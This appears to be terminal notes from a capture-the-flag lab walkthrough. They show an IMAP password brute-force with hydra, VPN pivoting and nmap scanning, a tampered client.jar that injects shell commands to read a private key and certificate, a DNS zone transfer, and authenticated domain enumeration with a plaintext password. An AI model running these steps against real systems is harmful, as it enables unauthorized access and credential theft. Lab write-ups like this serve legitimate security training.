-
Brute-force the mail (IMAP) password with hydra
# cat logins_mail.txt
sidorov@test.lab
ivanov@test.lab
petrov@test.lab
support@test.lab
hydra -L logins_mail.txt -P /tmp/1 imap://192.168.101.14 -t 60 -f -I
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-02-12 17:45:04
[DATA] max 44 tasks per 1 server, overall 44 tasks, 44 login tries (l:4/p:11), ~1 try per task
[DATA] attacking imap://192.168.101.14:143/
[ERROR] IMAP LOGIN AUTH : 2 NO [AUTHENTICATIONFAILED] Authentication failed.
[143][imap] host: 192.168.101.14 login: support@test.lab password: PASSWORD
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-02-12 17:45:12
telnet 192.168.101.14 imap
Connected to 192.168.101.14.
Escape character is '^]'.
*
a1 LOGIN support@test.lab PASSWORD
a1 OK
^]
telnet> quit
Connection closed.
root@kali ~/ctf/pentestitlab14 unzip vpn.zip -d vpn
Archive: vpn.zip
extracting: vpn/user
inflating: vpn/vpn.conf
root@kali ~/ctf/pentestitlab14 cd vpn
root@kali ~/ctf/pentestitlab14/vpn ls
user vpn.conf
root@kali ~/ctf/pentestitlab14/vpn
-
Connect to the new VPN
root@kali ~/ctf/pentestitlab14/vpn openvpn --config vpn.conf
Wed Feb 12 18:18:42 2020 WARNING: file 'user' is group or others accessible
Wed Feb 12 18:18:42 2020 OpenVPN 2.4.7 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [LZ4] [EPOLL] [PKCS11] [MH/PKTINFO] [AEAD] built on Feb 20 2019
Wed Feb 12 18:18:42 2020 library versions: OpenSSL 1.1.1d 10 Sep 2019, LZO 2.10
Wed Feb 12 18:18:42 2020 WARNING: No server certificate verification method has been enabled. See http://openvpn.net/howto.html#mitm for more info.
Wed Feb 12 18:18:42 2020 TCP/UDP: Preserving recently used remote address: [AF_INET]192.168.101.15:1194
Wed Feb 12 18:18:42 2020 Socket Buffers: R=[212992->212992] S=[212992->212992]
Wed Feb 12 18:18:42 2020 UDP link local (bound): [AF_INET][undef]:1194
Wed Feb 12 18:18:42 2020 UDP link remote: [AF_INET]192.168.101.15:1194
Wed Feb 12 18:18:42 2020 TLS: Initial packet from [AF_INET]192.168.101.15:1194, sid=6b57de4a c850dc54
Wed Feb 12 18:18:42 2020 WARNING: this configuration may cache passwords in memory -- use the auth-nocache option to prevent this
Wed Feb 12 18:18:42 2020 VERIFY OK: depth=1, C=RU, ST=Moscow, L=Moscow, O=test, OU=test, CN=test CA, name=EasyRSA, emailAddress=support@test.lab
Wed Feb 12 18:18:42 2020 VERIFY OK: depth=0, C=RU, ST=Moscow, L=Moscow, O=test, OU=test, CN=server, name=EasyRSA, emailAddress=support@test.lab
Wed Feb 12 18:18:42 2020 Control Channel: TLSv1.2, cipher TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, 2048 bit RSA
Wed Feb 12 18:18:42 2020 [server] Peer Connection Initiated with [AF_INET]192.168.101.15:1194
Wed Feb 12 18:18:43 2020 SENT CONTROL [server]: 'PUSH_REQUEST' (status=1)
Wed Feb 12 18:18:43 2020 PUSH: Received control message: 'PUSH_REPLY,route 172.16.0.0 255.255.0.0,route 10.11.0.1,topology net30,ifconfig 10.11.0.42 10.11.0.41,peer-id 9,cipher AES-256-GCM'
Wed Feb 12 18:18:43 2020 OPTIONS IMPORT: --ifconfig/up options modified
Wed Feb 12 18:18:43 2020 OPTIONS IMPORT: route options modified
Wed Feb 12 18:18:43 2020 OPTIONS IMPORT: peer-id set
Wed Feb 12 18:18:43 2020 OPTIONS IMPORT: adjusting link_mtu to 1625
Wed Feb 12 18:18:43 2020 OPTIONS IMPORT: data channel crypto options modified
Wed Feb 12 18:18:43 2020 Data Channel: using negotiated cipher 'AES-256-GCM'
Wed Feb 12 18:18:43 2020 Outgoing Data Channel: Cipher 'AES-256-GCM' initialized with 256 bit key
Wed Feb 12 18:18:43 2020 Incoming Data Channel: Cipher 'AES-256-GCM' initialized with 256 bit key
Wed Feb 12 18:18:43 2020 ROUTE_GATEWAY 192.168.51.1/255.255.255.0 IFACE=eth0 HWADDR=08:00:27:a0:58:f0
Wed Feb 12 18:18:43 2020 TUN/TAP device tun1 opened
Wed Feb 12 18:18:43 2020 TUN/TAP TX queue length set to 100
Wed Feb 12 18:18:43 2020 /sbin/ip link set dev tun1 up mtu 1500
Wed Feb 12 18:18:43 2020 /sbin/ip addr add dev tun1 local 10.11.0.42 peer 10.11.0.41
Wed Feb 12 18:18:44 2020 /sbin/ip route add 172.16.0.0/16 via 10.11.0.41
Wed Feb 12 18:18:44 2020 /sbin/ip route add 10.11.0.1/32 via 10.11.0.41
Wed Feb 12 18:18:44 2020 Initialization Sequence Completed
The PUSH_REPLY above pushes a route to a new subnet: 172.16.0.0/16
-
Scan 172.16.0.0/16 (masscan, nmap)
nmap -T5 -n -sn 172.16.0.0/24 ✔ ⚡ 3457 21:21:05
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-13 09:32 CET
Nmap scan report for 172.16.0.11
Host is up (0.071s latency).
Nmap done: 256 IP addresses (1 host up) scanned in 34.57 seconds
Nmap scan report for 172.16.0.20
Host is up (0.052s latency).
Not shown: 850 filtered ports, 139 closed ports
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
636/tcp open ldapssl
1024/tcp open kdm
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
Nmap scan report for 172.16.0.10
Host is up (0.052s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE
53/tcp open domain
-
client.jar
root@kali ~/ctf/pentestitlab14 java -jar client.jar
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
/dev/sda1 15G 2.0G 13G 14% /
root@kali ~/ctf/pentestitlab14
-
edit client.jar
jar -xf client.jar
root@kali ~/ctf/pentestitlab14/client-jar cd .. ✔ ⚡ 3397 20:23:21
root@kali ~/ctf/pentestitlab14 cp /media/sf_E_DRIVE/Downloads/client-jar/ . -r ✔ ⚡ 3398 20:24:04
root@kali ~/ctf/pentestitlab14 cd - ✔ ⚡ 3399 20:24:07
~/ctf/pentestitlab14/client-jar
root@kali ~/ctf/pentestitlab14/client-jar jar uf client.jar lab/test/client/Main.class ✔ ⚡ 3400 20:24:13
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
root@kali ~/ctf/pentestitlab14/client-jar java -jar client.jar ✔ ⚡ 3401 20:24:21
One-liner (the same steps combined):
root@kali ~/ctf/pentestitlab14/client-jar cd .. && cp /media/sf_E_DRIVE/Downloads/client-jar/ . -r && cd client-jar && jar uf client.jar lab/test/client/Main.class && java -jar client.jar
ldc "ls -al /home/dev/.crt;cat /home/dev/.crt/dev.crt;echo -e "\n\n\n\n"; cat /home/dev/.crt/dev.key;"
drwxr-xr-x 2 root root 4096 Nov 14 18:44 .
drwxr-xr-x 3 dev dev 4096 Nov 14 18:42 ..
-rw-r--r-- 1 root root 5358 Nov 14 18:43 dev.crt
-rw-r--r-- 1 root root 1705 Nov 14 18:43 dev.key
Certificate:
Data:
Version: 3 (0x2)
Serial Number: 3 (0x3)
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=RU, ST=Moscow, L=Moscow, O=test, OU=test, CN=test CA/name=EasyRSA/emailAddress=support@test.lab
Validity
Not Before: Nov 14 07:50:50 2019 GMT
Not After : Nov 11 07:50:50 2029 GMT
Subject: C=RU, ST=Moscow, L=Moscow, O=test, OU=test, CN=dev/name=EasyRSA/emailAddress=support@test.lab
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
Public-Key: (2048 bit)
Modulus:
00:ae:dc:b6:2b:c2:31:3e:e6:e7:de:88:e7:c6:a2:
1b:d2:9a:a1:8f:dd:8d:07:03:ad:24:f9:85:d0:dd:
5b:de:96:2f:95:66:b3:cc:25:b5:c6:f1:7f:ec:66:
d8:c7:84:e2:f0:db:6e:4a:8f:ee:b7:f2:c2:6e:cf:
f6:13:eb:a9:ba:2c:58:a3:1e:1f:ab:6b:4a:ec:39:
be:be:b8:3c:67:b2:24:cd:7a:49:fd:00:59:f5:9d:
b8:14:cc:e7:47:ae:ce:03:18:92:21:1d:6f:31:04:
aa:9e:aa:7e:76:99:b4:40:53:33:9f:67:f2:66:7f:
e7:f9:22:2f:c7:3b:8e:3a:08:0c:d7:7b:39:20:e0:
33:38:65:20:91:4c:2b:eb:b3:d4:9b:dd:06:05:90:
ae:47:6b:91:55:2b:9e:06:58:de:62:68:92:d8:94:
2c:f7:61:a1:f6:22:c9:4a:7c:dd:06:bf:fb:0d:b3:
1d:2d:1c:a4:ea:8e:70:28:bd:be:d3:43:23:6f:ba:
dc:94:db:da:82:52:58:fb:36:45:06:c2:c4:37:c5:
e6:c8:73:a5:3d:2f:a6:11:d4:d6:19:29:65:99:8b:
5b:87:e1:51:b0:f6:12:8a:d0:02:84:45:13:85:69:
22:ed:07:44:3c:a7:6b:91:32:a2:4f:2b:9e:79:83:
46:b3
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Basic Constraints:
CA:FALSE
Netscape Comment:
Easy-RSA Generated Certificate
X509v3 Subject Key Identifier:
51:51:D9:D1:8E:E2:36:87:DE:62:E3:98:68:7D:68:DB:E3:AB:35:87
X509v3 Authority Key Identifier:
keyid:61:14:9C:EE:28:7B:A5:2D:69:B6:AB:34:C9:9B:87:73:07:49:20:69
DirName:/C=RU/ST=Moscow/L=Moscow/O=test/OU=test/CN=test CA/name=EasyRSA/emailAddress=support@test.lab
serial:F5:C2:6A:50:05:37:8F:F8
X509v3 Extended Key Usage:
TLS Web Client Authentication
X509v3 Key Usage:
Digital Signature
X509v3 Subject Alternative Name:
DNS:dev
Signature Algorithm: sha256WithRSAEncryption
86:02:4e:d1:25:78:1f:a9:8a:f9:c9:52:7c:4b:92:e4:59:bf:
33:37:86:54:cc:0a:54:a5:5b:8c:70:ba:9d:92:12:24:f8:aa:
80:7a:f0:4b:9a:c1:d1:93:95:c9:72:04:96:d3:8e:30:3d:26:
53:d8:12:e7:31:9a:71:a1:29:31:8b:83:21:fa:fe:e9:93:9b:
af:6c:e4:6f:93:03:ba:a2:8b:53:0f:4d:d9:3b:af:c1:75:36:
3f:3f:1f:28:28:9f:36:37:a3:f2:b8:d7:89:bd:f5:6d:f8:cf:
7a:ac:2f:88:22:6e:9e:00:30:14:db:c6:2f:1b:54:bd:5e:9a:
f5:46:7e:ca:e3:2e:54:f8:29:fd:67:38:9b:14:30:c6:e3:b6:
de:6d:a4:5d:51:84:ec:48:19:7e:40:1f:56:4e:46:52:10:23:
17:57:1c:f0:ce:96:70:9a:f8:e7:7b:51:00:d4:98:ce:09:16:
d7:4b:72:7f:38:aa:ae:42:10:4b:4f:c3:f9:bc:8a:92:03:42:
7b:1f:7c:8c:5e:3c:78:9a:f7:4c:f6:67:47:74:fb:8c:6f:75:
31:8e:e5:43:14:7f:50:9e:c0:4f:fe:d4:ef:d0:44:3c:e5:f2:
f5:46:e8:e9:da:92:b9:f2:d2:42:97:7c:05:b2:22:5d:0b:3b:
71:3d:d0:a0
-----BEGIN CERTIFICATE-----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-----END CERTIFICATE-----
-----BEGIN PRIVATE KEY-----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-----END PRIVATE KEY-----
root@kali ~/ctf/pentestitlab14/client-jar vim dev.crt.172.16.20.2 SIGINT(2) ↵ ⚡ 3447 21:01:00
root@kali ~/ctf/pentestitlab14/client-jar vim dev.key.172.16.20.2 ✔ ⚡ 3450 21:01:51
root@kali ~/ctf/pentestitlab14/client-jar chmod 600 dev.key.172.16.20.2 ✔ ⚡ 3451 21:02:08
root@kali ~/ctf/pentestitlab14/client-jar
cat /opt/token
L0* Dws7m|b;ek
-
172.16.0.11
root@kali ~/ctf/pentestitlab14 curl http://172.16.0.11/token
#trfioefjio
root@kali ~/ctf/pentestitlab14
-
DNS
root@kali ~/ctf/pentestitlab14/client-jar dig axfr @172.16.0.20 test.lab. ✔ ⚡ 3515 15:07:15
; <<>> DiG 9.11.14-3-Debian <<>> axfr @172.16.0.20 test.lab.
; (1 server found)
;; global options: +cmd
test.lab.
3600
IN
SOA
ad1.test.lab. hostmaster.test.lab. 1 900 600 86400 3600
; Transfer failed.
root@kali ~/ctf/pentestitlab14/client-jar dig axfr @172.16.0.10 test.lab. ✔ ⚡ 3516 15:07:17
; <<>> DiG 9.11.14-3-Debian <<>> axfr @172.16.0.10 test.lab.
; (1 server found)
;; global options: +cmd
test.lab.
21600
IN
SOA
test.lab. ns1.test.lab. 117 5 30 21600 60
test.lab.
21600
IN
NS
ns1.test.lab.
test.lab.
21600
IN
NS
ns2.test.lab.
test.lab.
21600
IN
A
172.16.0.20
test.lab.
21600
IN
A
172.16.50.20
_kerberos._tcp.dc._msdcs.test.lab. 21600 IN SRV
0 0 88 test.lab.
_ldap._tcp.dc._msdcs.test.lab. 21600 IN
SRV
0 0 389 test.lab.
gc._msdcs.test.lab.
21600
IN
A
172.16.50.20
_ldap._tcp.gc._msdcs.test.lab. 21600 IN
SRV
0 0 3268 test.lab.
_kerberos._tcp.test.lab. 21600
IN
SRV
0 0 88 test.lab.
_kpasswd._tcp.test.lab.
21600
IN
SRV
0 0 464 test.lab.
_ldap._tcp.test.lab.
21600
IN
SRV
0 0 389 test.lab.
_kerberos._udp.test.lab. 21600
IN
SRV
0 0 88 test.lab.
_kpasswd._udp.test.lab.
21600
IN
SRV
0 0 464 test.lab.
admin.test.lab.
21600
IN
A
172.16.40.3
dc.test.lab.
21600
IN
A
172.16.50.20
dc1.test.lab.
21600
IN
A
172.16.50.20
dc2.test.lab.
21600
IN
A
172.16.0.20
dns.test.lab.
21600
IN
A
172.16.0.10
dns.test.lab.
21600
IN
A
172.16.50.10
elastic.test.lab.
21600
IN
A
172.16.40.6
_ldap._tcp.ForestDnsZones.test.lab. 21600 IN SRV 0 0 389 test.lab.
git.test.lab.
21600
IN
A
172.16.0.21
mail.test.lab.
21600
IN
A
172.16.50.3
news.test.lab.
21600
IN
A
172.16.50.21
ns1.test.lab.
21600
IN
A
172.16.50.10
ns2.test.lab.
21600
IN
A
172.16.0.10
site.test.lab.
21600
IN
A
172.16.50.2
token-SDS34gs93.test.lab. 21600
IN
A
127.0.0.1 new token :) (ns)
vpn-1.test.lab.
21600
IN
A
172.16.50.11
vpn-2.test.lab.
21600
IN
A
172.16.0.11
test.lab.
21600
IN
SOA
test.lab. ns1.test.lab. 117 5 30 21600 60
-
DC2
root@kali ~/ctf/pentestitlab14 enum4linux 172.16.0.20 -u 'DC2\dev' -p 'L1(#@ru0euh0if' 1 ↵ ⚡ 3600 16:25:46
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Feb 13 16:26:10 2020
==========================
| Target Information |
==========================
Target ........... 172.16.0.20
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
===================================================
| Enumerating Workgroup/Domain on 172.16.0.20 |
===================================================
[+] Got domain/workgroup name: TEST
===========================================
| Nbtstat Information for 172.16.0.20 |
===========================================
Looking up status of 172.16.0.20
DC2 <00> - M <ACTIVE> Workstation Service
DC2 <03> - M <ACTIVE> Messenger Service
DC2 <20> - M <ACTIVE> File Server Service
TEST <1c> - <GROUP> M <ACTIVE> Domain Controllers
TEST <00> - <GROUP> M <ACTIVE> Domain/Workgroup Name
__SAMBA__ <00> - <GROUP> M <ACTIVE> <PERMANENT> Domain/Workgroup Name
MAC Address = 00-00-00-00-00-00
====================================
| Session Check on 172.16.0.20 |
====================================
[+] Server 172.16.0.20 allows sessions using username '', password ''
==========================================
| Getting domain SID for 172.16.0.20 |
==========================================
Domain Name: TEST
Domain Sid: S-1-5-21-518050695-217262318-2335301019
[+] Host is part of a domain (not a workgroup)
=====================================
| OS information on 172.16.0.20 |
=====================================
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 172.16.0.20 from smbclient:
[+] Got OS info for 172.16.0.20 from srvinfo:
DC2 Wk Sv PrQ Unx NT SNT Samba 4.5.16-Debian
platform_id :
500
os version :
6.1
server type :
0x809a03
============================
| Users on 172.16.0.20 |
============================
index: 0x1 RID: 0x44f acb: 0x00000010 Account: sidorov
Name: Maksim Sidorov
Desc:
index: 0x2 RID: 0x1f4 acb: 0x00000010 Account: Administrator
Name:
Desc: Built-in account for administering the computer/domain
index: 0x3 RID: 0x450 acb: 0x00000010 Account: ivanov
Name: Ego Ivanov
Desc:
index: 0x4 RID: 0x458 acb: 0x00000010 Account: leonov
Name: Leonov
Desc:
index: 0x5 RID: 0x457 acb: 0x00000010 Account: petrov
Name: Petrov
Desc:
index: 0x6 RID: 0x1f6 acb: 0x00000011 Account: krbtgt
Name:
Desc: Key Distribution Center Service Account
index: 0x7 RID: 0x1f5 acb: 0x00000215 Account: Guest
Name:
Desc: Built-in account for guest access to the computer/domain
index: 0x8 RID: 0x452 acb: 0x00000010 Account: token_OWdjwifiw0
Name: Token
Desc:
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[sidorov] rid:[0x44f]
user:[ivanov] rid:[0x450]
user:[token_OWdjwifiw0] rid:[0x452]
user:[petrov] rid:[0x457]
user:[leonov] rid:[0x458]
========================================
| Share Enumeration on 172.16.0.20 |
========================================
Sharename Type Comment
--------- ---- -------
netlogon Disk
sysvol Disk
IPC$ IPC IPC Service (Samba 4.5.16-Debian)
SMB1 disabled -- no workgroup available
[+] Attempting to map shares on 172.16.0.20
//172.16.0.20/netlogon
Mapping: DENIED, Listing: N/A
//172.16.0.20/sysvol
Mapping: DENIED, Listing: N/A
//172.16.0.20/IPC$
[E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
===================================================
| Password Policy Information for 172.16.0.20 |
===================================================
[+] Attaching to 172.16.0.20 using a NULL share
[+] Trying protocol 139/SMB...
[+] Found domain(s):
[+] TEST
[+] BUILTIN
[+] Password Info for Domain: TEST
[+] Minimum password length: 7
[+] Password history length: 24
[+] Maximum password age: 268 days 23 hours 59 minutes
[+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0
[+] Minimum password age: 268 days 2 minutes
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: Not Set
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 7
=============================
| Groups on 172.16.0.20 |
=============================
[+] Getting builtin groups:
group:[Administrators] rid:[0x220]
group:[Users] rid:[0x221]
group:[Guests] rid:[0x222]
group:[Account Operators] rid:[0x224]
group:[Server Operators] rid:[0x225]
group:[Print Operators] rid:[0x226]
group:[Backup Operators] rid:[0x227]
group:[Replicator] rid:[0x228]
group:[Pre-Windows 2000 Compatible Access] rid:[0x22a]
group:[Remote Desktop Users] rid:[0x22b]
group:[Network Configuration Operators] rid:[0x22c]
group:[Incoming Forest Trust Builders] rid:[0x22d]
group:[Performance Monitor Users] rid:[0x22e]
group:[Performance Log Users] rid:[0x22f]
group:[Windows Authorization Access Group] rid:[0x230]
group:[Terminal Server License Servers] rid:[0x231]
group:[Distributed COM Users] rid:[0x232]
group:[IIS_IUSRS] rid:[0x238]
group:[Cryptographic Operators] rid:[0x239]
group:[Event Log Readers] rid:[0x23d]
group:[Certificate Service DCOM Access] rid:[0x23e]
[+] Getting builtin group memberships:
[+] Getting local groups:
group:[Cert Publishers] rid:[0x205]
group:[RAS and IAS Servers] rid:[0x229]
group:[Allowed RODC Password Replication Group] rid:[0x23b]
group:[Denied RODC Password Replication Group] rid:[0x23c]
group:[DnsAdmins] rid:[0x44d]
[+] Getting local group memberships:
Group 'Denied RODC Password Replication Group' (RID: 572) has member: TEST\Cert Publishers
Group 'Denied RODC Password Replication Group' (RID: 572) has member: TEST\Read-Only Domain Controllers
Group 'Denied RODC Password Replication Group' (RID: 572) has member: TEST\krbtgt
Group 'Denied RODC Password Replication Group' (RID: 572) has member: TEST\Domain Controllers
Group 'Denied RODC Password Replication Group' (RID: 572) has member: TEST\Schema Admins
Group 'Denied RODC Password Replication Group' (RID: 572) has member: TEST\Domain Admins
Group 'Denied RODC Password Replication Group' (RID: 572) has member: TEST\Group Policy Creator Owners
Group 'Denied RODC Password Replication Group' (RID: 572) has member: TEST\Enterprise Admins
[+] Getting domain groups:
group:[Enterprise Read-Only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-Only Domain Controllers] rid:[0x209]
group:[DnsUpdateProxy] rid:[0x44e]
[+] Getting domain group memberships:
Group 'Group Policy Creator Owners' (RID: 520) has member: TEST\Administrator
Group 'Schema Admins' (RID: 518) has member: TEST\Administrator
Group 'Domain Admins' (RID: 512) has member: TEST\Administrator
Group 'Enterprise Admins' (RID: 519) has member: TEST\Administrator
======================================================================
| Users on 172.16.0.20 via RID cycling (RIDS: 500-550,1000-1050) |
======================================================================
[I] Found new SID: S-1-5-21-518050695-217262318-2335301019
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-21-518050695-217262318-2335301019 and logon username '', password ''
S-1-5-21-518050695-217262318-2335301019-500 TEST\Administrator (Local User)
S-1-5-21-518050695-217262318-2335301019-501 TEST\Guest (Local User)
S-1-5-21-518050695-217262318-2335301019-502 TEST\krbtgt (Local User)
S-1-5-21-518050695-217262318-2335301019-503 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-504 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-505 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-506 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-507 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-508 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-509 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-510 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-511 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-512 TEST\Domain Admins (Domain Group)
S-1-5-21-518050695-217262318-2335301019-513 TEST\Domain Users (Domain Group)
S-1-5-21-518050695-217262318-2335301019-514 TEST\Domain Guests (Domain Group)
S-1-5-21-518050695-217262318-2335301019-515 TEST\Domain Computers (Domain Group)
S-1-5-21-518050695-217262318-2335301019-516 TEST\Domain Controllers (Domain Group)
S-1-5-21-518050695-217262318-2335301019-517 TEST\Cert Publishers (Local Group)
S-1-5-21-518050695-217262318-2335301019-518 TEST\Schema Admins (Domain Group)
S-1-5-21-518050695-217262318-2335301019-519 TEST\Enterprise Admins (Domain Group)
S-1-5-21-518050695-217262318-2335301019-520 TEST\Group Policy Creator Owners (Domain Group)
S-1-5-21-518050695-217262318-2335301019-521 TEST\Read-Only Domain Controllers (Domain Group)
S-1-5-21-518050695-217262318-2335301019-522 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-523 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-524 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-525 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-526 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-527 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-528 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-529 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-530 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-531 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-532 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-533 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-534 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-535 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-536 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-537 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-538 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-539 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-540 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-541 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-542 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-543 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-544 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-545 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-546 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-547 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-548 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-549 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-550 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1000 TEST\AD1$ (Local User)
S-1-5-21-518050695-217262318-2335301019-1001 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1002 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1003 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1004 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1005 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1006 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1007 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1008 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1009 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1010 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1011 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1012 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1013 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1014 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1015 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1016 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1017 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1018 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1019 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1020 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1021 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1022 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1023 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1024 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1025 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1026 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1027 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1028 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1029 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1030 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1031 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1032 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1033 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1034 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1035 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1036 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1037 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1038 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1039 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1040 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1041 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1042 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1043 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1044 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1045 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1046 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1047 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1048 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1049 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1050 *unknown*\*unknown* (8)
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
